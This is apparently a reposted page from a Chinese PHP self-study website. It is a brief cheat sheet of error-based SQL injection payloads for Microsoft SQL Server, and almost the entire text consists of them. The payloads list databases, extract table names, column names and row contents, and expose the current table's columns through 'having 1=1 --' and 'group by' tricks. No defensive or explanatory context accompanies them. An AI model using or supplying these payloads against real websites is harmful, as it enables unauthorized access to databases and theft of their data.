MSSQL暴库问题 - 网站安全 - 自学php

//爆库

select name from sysdatabases

//暴表

and 1=(select top 1 quotename(name) from sysobjects where xtype=CHAR(85) and name not in (select top N name from sysobjects where xtype=CHAR(85)))

//暴字段

and 1=(select quotename(col_name(object_id('表'),N)))

//暴内容

and 1=(select top 1 quotename(字段) from 表where 字段not in (select top N 字段from 表))

//暴当前表名

having 1=1 --

//暴当前表的其它列

group by table_name.column1,table_name.column2 having 1=1 --

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://www.haodehen.cn/did11665

更新时间：2022-09-13 阅读：52次